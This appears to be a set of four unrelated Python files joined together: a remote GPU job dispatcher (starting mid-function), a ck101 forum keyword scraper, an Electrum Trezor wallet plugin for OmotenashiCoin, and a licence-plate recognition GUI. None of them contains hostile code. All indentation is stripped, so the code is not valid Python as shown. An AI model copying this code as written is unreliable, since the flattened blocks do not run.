"""Queries the host whether the given hardware requirements are satisfied and satisfiable
"""
satisfies = False
satisfiable = False
queued_gpus = []
if required_gpus > 0:
try:
gpu_util = query_gpu_utilization(host)
if len(gpu_util) >= required_gpus:
# check for satisfiability
req_mem_satisfiable = 0
for mem_used, mem_total, temp in gpu_util:
if mem_total > required_gpu_mem:
req_mem_satisfiable += 1
if req_mem_satisfiable >= required_gpus:
satisfiable = True
for gpui, gpu in enumerate(gpu_util):
if gpu[2] > MAX_TEMPERATURE:
continue
if (gpu[1]-gpu[0]) >= required_gpu_mem:
queued_gpus.append(str(gpui))
if len(queued_gpus) == required_gpus:
satisfies = True
break
except RuntimeError:
satisfiable = False
if required_cpu_mem > 0:
try:
cpu_util, cpu_mem, cpu_total_mem = query_cpu_utilization(host)
satisfies = required_cpu_mem < cpu_mem
satisfiable = cpu_total_mem >= required_cpu_mem
except RuntimeError:
satisfiable = False
return satisfies, satisfiable, queued_gpus
def find_free_host(hostlist,
required_gpus, required_gpu_mem,
required_cpu_mem,
):
"""Returns the first host, that matches the required number of gpus and memory
Parameters
----------
hostlist : list
List of hostnames or addresses
required_gpus : int
Number of required gpus
required_gpu_mem : int
Amount of free memory required per gpu in GB
required_cpu_mem : int
Amount of free cpu memory required in GB
Returns
----------
str
Hostname that matches the conditions
list
GPU utilizations of the host
"""
any_satisfies = False
for host in hostlist:
satisfies, satisfiable, gpu_list = host_satisfies_conditions(host, required_gpus, required_gpu_mem, required_cpu_mem)
if satisfies:
return host, gpu_list
if satisfiable:
any_satisfies = True
if not any_satisfies:
raise RuntimeError('Conditions based on %d required gpus with %dMB each is not satisfiable by any machine at any time.' % (required_gpus, required_gpu_mem))
return None, []
def __interrupt_safe_put(q, obj, timeout=0.1):
while True:
try:
q.put(obj, timeout=timeout)
except queue.Full:
continue
return
def __interrupt_safe_get(q, timeout=0.1, verbose=False):
t0 = time.time()
t1 = t0
dt = 5.
while True:
try:
obj = q.get(timeout=timeout)
except queue.Empty:
if verbose and (time.time()-t1) > dt:
_print_info('Waiting for free host. Elapsed time %.1fs ...'%(time.time()-t0))
t1 = time.time()
dt = 60.
continue
except Exception as e:
print('#################################')
print(e)
return obj
def _async_dispatch(task, queue_pending, queue_ready, log_target):
"""Dispatch helper loop. Do not call individually.
Loops randomly over all hosts and dispatches the given command if a host satisfies the given requirements on memory and number of gpus.
Parameters
----------
task : tuple
Tuple of length 4 (int, str, int, int), stating the command id, the command string, the number of required gpus and the amount of required free memory in Megabytes.
queue_pending : multiprocessing.Queue
Enqueues list of hostnames that have not been evaluated for utilization yet
queue_ready : multiprocessing.Queue
Enqueues list of hosts that satisfy gpu requirements and are ready to use
log_target : str
One of the keys in LOG_TARGETS
Returns
----------
str
Hostname, the command was dispatched to
tuple
IDs of the gpus used on the host
str
A copy of the command executed on the host, including the set CUDA_VISIBLE_DEVICES environment variable.
"""
seed(datetime.datetime.now())
idx, command = task
dispatched = False
available_host = None
tries_left = MAX_RETRIES
while not dispatched:
access_info = None
while access_info is None:
access_info = __interrupt_safe_get(queue_ready, verbose=True)
if type(access_info) is str and access_info == 'SHUTDOWN':
break
# if the information is greater than 5 seconds old, put back in pending queue
if (time.time() - access_info['t']) > 5.0:
__interrupt_safe_put(queue_pending, (access_info['hostname'], 0))
access_info = None
available_host, gpuids = access_info['hostname'], access_info['gpuids']
if available_host is not None:
dispatched = True
host_command = 'export CUDA_VISIBLE_DEVICES=%s; %s'%(','.join(gpuids), command)
key = time_stamped()
if log_target.startswith('file'):
logfilepath = './%s-[%d]-%s.out' % (key, idx, available_host)
print('Log file at: %s'%logfilepath)
logfile = open(logfilepath, 'w')
logfile.write(host_command+'\n\n')
else:
logfile = LOG_TARGETS[log_target]
_print_info('Dispatching command [%d] on host %s on gpus: %s' % (idx, available_host, ','.join(gpuids)))
t_start = time.time()
try:
# disable this host for 10 seconds to allow enough time to reserve memory
__interrupt_safe_put(queue_pending, (available_host, t_start + RESERVE_TIME_FOR_JOB_STARTUP))
retcode, lastoutput = remote_exec(available_host, host_command, logfile=logfile)
except KeyboardInterrupt as e:
_print_error('Interrupted command [%d] on host %s on gpus: %s' % (idx, available_host, ','.join(gpuids)))
return None, None, None
finally:
t_end = time.time()
if logfile is not None and logfile is not sys.stdout and logfile is not sys.stderr:
logfile.close()
if retcode != 0:
if log_target == 'file_autorm' and (t_end - t_start) < 10.:
os.remove(logfilepath)
if log_target.startswith('file'):
if os.path.isfile(logfilepath):
os.rename(logfilepath, logfilepath[:-4]+'_failed.out')
if tries_left > 0:
_print_warning('Error while executing command [%d] on host %s on gpus %s. Trying again ...' % (idx, available_host, ','.join(gpuids)))
_print_warning('Last output line:\n%s' % lastoutput)
dispatched = False
tries_left -= 1
else:
_print_error('Error while executing command [%d] on host %s on gpus %s. Skipping job:' % (idx, available_host, ','.join(gpuids)))
_print_error('-------------------------------------')
_print_error(command)
_print_error('-------------------------------------')
else:
_print_ok('Finished command [%d] on host %s on gpus: %s' % (idx, available_host, ','.join(gpuids)))
_print_ok('Last output line:\n%s' % lastoutput)
if not dispatched:
print('Command [%d] pending...' % idx)
# time.sleep(1) # sleep 1 second
return available_host, gpuids, host_command
def _utilization_enqueuer(numhosts, queue_ready, queue_pending, required_gpus, required_gpu_mem, required_cpu_mem):
# conditions_satisfiable = False
# if not conditions_satisfiable:
# raise RuntimeError('Conditions based on %d required gpus with %dMB each is not satisfiable by any machine at any time.' % (required_gpus, required_gpu_mem))
while True:
host, twait = __interrupt_safe_get(queue_pending)
if host == '':
# We're done
break
if time.time() < twait:
# do not evaluate this host yet
__interrupt_safe_put(queue_pending, (host, twait))
continue
timestamp = time.time()
try:
# print('[%s] Querying ...'%host)
satisfies, satisfiable, queued_gpus = host_satisfies_conditions(host, required_gpus, required_gpu_mem, required_cpu_mem)
except TimeoutError:
# print('[%s] Timeout'%host)
satisfiable = None
satisfies = False
except RemoteError:
# print('[%s] Remote execution error'%host)
satisfiable = None
satisfies = False
if satisfiable is None or satisfiable == True:
if satisfies:
try:
queue_ready.put({'t': timestamp, 'hostname': host, 'gpuids': queued_gpus}, timeout=0.1)
except queue.Full as e:
# put back in pending queue, if queue_ready is full (that should not happen)
print('Unexpected Exception caught: queue.Full')
queue_pending.put((host, 0), timeout=0.1)
else:
# put back and check later in 5 seconds
__interrupt_safe_put(queue_pending, (host, time.time() + 5))
else:
# otherwise, leave the host out of our list entirely. It will never satisfy our requirements
# print('never satisfies: %s'%host)
numhosts -= 1
if numhosts == 0:
# Notify all dispatcher processes to shutdown
for k in range(MAX_PARALLEL_JOBS):
__interrupt_safe_put(queue_ready, 'SHUTDOWN')
raise RuntimeError('Conditions are not satisfiable by any machine at any time.')
pass
def dispatch(hostlist, commands, required_gpus=1, required_gpu_mem=8, required_cpu_mem=0, log_target='file'):
"""Main dispatcher method.
Arguments
----------
hostlist : list
List of hostnames or addresses
commands : list
List of command strings, as would be written in shell. Ensure the correct working directory by prepending a `cd ~/workdir/...;` if necessary.
required_gpus : int
Integer or list of integers defining the minimum number of required gpus on a single host. If list, len(required_gpus) must be equal to len(commands)
required_gpu_mem : int
In GB. Integer or list of integers, defining the minimum amount of free memory required per gpu on a single host.
required_cpu_mem : int
In GB. Integer or list of integers, defining the mimimum amount of available cpu memory on a single host.
log_target : str
One of the keys in LOG_TARGETS
"""
if type(required_gpus) is list and len(required_gpus) != len(commands):
raise RuntimeError('Entries in required_gpus list must be equal to entries in commands.')
if type(required_gpu_mem) is list and len(required_gpu_mem) != len(commands):
raise RuntimeError('Entries in required_gpu_mem list must be equal to entries in commands.')
if type(required_cpu_mem) is list and len(required_cpu_mem) != len(commands):
raise RuntimeError('Entries in required_cpu_mem list must be equal to entries in commands.')
# if type(required_gpus) is int:
# required_gpus = [required_gpus]*len(commands)
# if type(required_gpu_mem) is int:
# required_gpu_mem = [required_gpu_mem]*len(commands)
pool = mp.Pool(processes=MAX_PARALLEL_JOBS)
m = mp.Manager()
# fill queue
queue_pending = m.Queue(len(hostlist)+1)
queue_ready = m.Queue(len(hostlist)+1)
shuffle(hostlist)
for host in hostlist:
queue_pending.put((host, 0))
numhosts = len(hostlist)
# start enqueuer
enqueuer = mp.Process(target=_utilization_enqueuer, args=(numhosts, queue_ready, queue_pending, required_gpus, required_gpu_mem, required_cpu_mem))
enqueuer.start()
cmdinds = range(len(commands))
pool.map_async(
partial(_async_dispatch, queue_pending=queue_pending, queue_ready=queue_ready, log_target=log_target),
zip(cmdinds, commands)
).get(9999999)
print('Please wait for processes to finish...')
pool.close()
queue_pending.put(('', 0))
pool.join()
enqueuer.join()
|
CKCrawler.py
|
from bs4 import BeautifulSoup as bs
from urllib.request import urlopen
from urllib.request import Request
import threading
import webbrowser
from collections import OrderedDict
class CKCrawler(object):
def __init__(self, tid, keywod, p1, p2):
homeData = self.getpageData(tid, 1)
lastPage = int(homeData.find('a', class_="last").string[3:])
p2 = lastPage if p2 == 99999 else p2
self.err = None
if p1 > lastPage or p2 > lastPage:
self.err = '好像沒這麼多頁喔'
return
self.donelist = []
self.findlist = {}
self.total = p2 - p1 + 1
self.tid = tid
self.th1, self.th2, self.th3 = self.createThread(p1, p2, tid, keywod)
def getpageData(self, tid, page):
url = 'https://ck101.com/thread-{}-{}-1.html'.format(tid, page)
req = Request(url, headers={'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'})
data = bs(urlopen(req).read(), 'lxml')
return data
def createThread(self, p1, p2, tid, keyword):
total = p2 - p1 + 1
def search(start, end):
for i in range(start, end):
data = self.getpageData(tid, i)
articles = data.find_all('td', class_="t_f")
for article in articles:
pid = article.attrs['id'].split('_')[-1]
content = article.text.replace('\r\n', '')
idx = content.find(keyword)
if idx == -1:
continue
num = 100
grabs = max(idx - num, 0)
grage = idx + len(keyword) + num
self.findlist[pid] = content[grabs:grage]
self.donelist.append(i)
if total <= 3:
th1 = threading.Thread(target=search, args=(p1, p2 + 1))
th2 = threading.Thread(target=search, args=(p1, p1))
th3 = threading.Thread(target=search, args=(p1, p1))
else:
gap = self.total // 3
s1, s2, s3, s4 = p1, p1 + gap, p1 + 2 * gap, p2 + 1
th1 = threading.Thread(target=search, args=(s1, s2))
th2 = threading.Thread(target=search, args=(s2, s3))
th3 = threading.Thread(target=search, args=(s3, s4))
return th1, th2, th3
def startThread(self):
self.th1.start()
self.th2.start()
self.th3.start()
def openHtml(self):
message = """
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style>
body {background-color: #bcbcbc; font-family: "Microsoft JhengHei", "Times New Roman";}
a {background-color: #ceecec; display:block; width: 50%;
padding: 20px; border-radius: 15px; -moz-border-radius: 15px;
text-decoration:none;color:black; white-space: pre-line; margin: auto;}
a:visited {background-color: #ececec;}
</style>
</head>
<body>
"""
sortedDict = OrderedDict(sorted(self.findlist.items()))
for key, val in sortedDict.items():
message += self.herfModule(key, val)
message += """
</body>
</html>
"""
with open('result.html', 'w', encoding='utf-16-le') as f:
f.write(message)
webbrowser.open_new_tab('result.html')
def herfModule(self, pid, world):
url = 'https://ck101.com/forum.php?mod=redirect&goto=findpost&ptid={}&pid={}'.format(self.tid, pid)
return """<a href="{}" target="_blank">{}</a>
<br>""".format(url, world)
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
# libraries_URL = 'https://github.com/trezor/python-trezor' # kani
libraries_URL = 'https://github.com/omotenashicoin-project/python-trezor.git'
minimum_firmware = (1, 6, 0)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 12)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
try:
call_bridge("enumerate")
except Exception:
devices = trezorlib.transport.enumerate_devices()
else:
devices = BridgeTransport.enumerate()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "MTNS Testnet" if constants.net.TESTNET else "OmotenashiCoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
surface.py
|
"""
@ Author : Jimeng Shi
@ Date : 1/23/2021
@ FileName : surface.py
"""
import tkinter as tk
from tkinter.filedialog import *
from tkinter import ttk
import predict
import cv2
from PIL import Image, ImageTk
import threading
import time
class Surface(ttk.Frame):
pic_path = " "
view_high = 600
view_wide = 600
update_time = 0
thread = None
thread_run = False
camera = None
color_transform = {"green": ("绿牌", "#55FF55"), "yello": ("黄牌", "#FFFF00"), "blue" : ("蓝牌", "#6666FF")}
def __init__(self, win):
ttk.Frame.__init__(self, win)
frame_left = ttk.Frame(self)
frame_right1 = ttk.Frame(self)
frame_right2 = ttk.Frame(self)
win.title("车牌识别")
win.state("zoomed")
self.pack(fill=tk.BOTH, expand=tk.YES, padx="5", pady="5")
frame_left.pack(side=LEFT, expand=1, fill=BOTH)
frame_right1.pack(side=TOP, expand=1, fill=tk.Y)
frame_right2.pack(side=RIGHT, expand=0)
ttk.Label(frame_left, text='原图:').pack(anchor="nw")
ttk.Label(frame_right1, text='车牌位置:').grid(column=0, row=0, sticky=tk.W)
from_pic_ctl = ttk.Button(frame_right2, text="来自图片", width=20, command=self.from_pic)
from_vedio_ctl = ttk.Button(frame_right2, text="来自摄像头", width=20, command=self.from_vedio)
self.image_ctl = ttk.Label(frame_left)
self.image_ctl.pack(anchor="nw")
self.roi_ctl = ttk.Label(frame_right1)
self.roi_ctl.grid(column=0, row=1, sticky=tk.W)
ttk.Label(frame_right1, text='识别结果:').grid(column=0, row=2, sticky=tk.W)
self.r_ctl = ttk.Label(frame_right1, text="")
self.r_ctl.grid(column=0, row=3, sticky=tk.W)
self.color_ctl = ttk.Label(frame_right1, text="", width="20")
self.color_ctl.grid(column=0, row=4, sticky=tk.W)
from_vedio_ctl.pack(anchor="se", pady="5")
from_pic_ctl.pack(anchor="se", pady="5")
self.predictor = predict.CardPredictor()
self.predictor.train_svm()
def get_imgtk(self, img_bgr):
img = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2RGB)
im = Image.fromarray(img)
imgtk = ImageTk.PhotoImage(image=im)
wide = imgtk.width()
high = imgtk.height()
if wide > self.view_wide or high > self.view_high:
wide_factor = self.view_wide / wide
high_factor = self.view_high / high
factor = min(wide_factor, high_factor)
wide = int(wide * factor)
if wide <= 0 : wide = 1
high = int(high * factor)
if high <= 0 : high = 1
im = im.resize((wide, high), Image.ANTIALIAS)
imgtk = ImageTk.PhotoImage(image=im)
return imgtk
def show_roi(self, r, roi, color):
if r :
roi = cv2.cvtColor(roi, cv2.COLOR_BGR2RGB)
roi = Image.fromarray(roi)
self.imgtk_roi = ImageTk.PhotoImage(image=roi)
self.roi_ctl.configure(image=self.imgtk_roi, state='enable')
self.r_ctl.configure(text=str(r))
self.update_time = time.time()
try:
c = self.color_transform[color]
self.color_ctl.configure(text=c[0], background=c[1], state='enable')
except:
self.color_ctl.configure(state='disabled')
elif self.update_time + 8 < time.time():
self.roi_ctl.configure(state='disabled')
self.r_ctl.configure(text="")
self.color_ctl.configure(state='disabled')
def from_vedio(self):
if self.thread_run:
return
if self.camera is None:
self.camera = cv2.VideoCapture(0)
if not self.camera.isOpened():
mBox.showwarning('Warn!', 'Fail to open camera!')
self.camera = None
return
self.thread = threading.Thread(target=self.vedio_thread, args=(self,))
self.thread.setDaemon(True)
self.thread.start()
self.thread_run = True
def from_pic(self):
self.thread_run = False
self.pic_path = askopenfilename(title="选择识别图片", filetypes=[("image", ".jpg"), ("image", ".png")])
if self.pic_path:
img_bgr = predict.imreadex(self.pic_path)
self.imgtk = self.get_imgtk(img_bgr)
self.image_ctl.configure(image=self.imgtk)
resize_rates = (1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4)
for resize_rate in resize_rates:
print("resize_rate:", resize_rate)
r, roi, color = self.predictor.predict(img_bgr, resize_rate)
if r:
break
#r, roi, color = self.predictor.predict(img_bgr, 1)
self.show_roi(r, roi, color)
@staticmethod
def vedio_thread(self):
self.thread_run = True
predict_time = time.time()
while self.thread_run:
_, img_bgr = self.camera.read()
self.imgtk = self.get_imgtk(img_bgr)
self.image_ctl.configure(image=self.imgtk)
if time.time() - predict_time > 2:
r, roi, color = self.predictor.predict(img_bgr)
self.show_roi(r, roi, color)
predict_time = time.time()
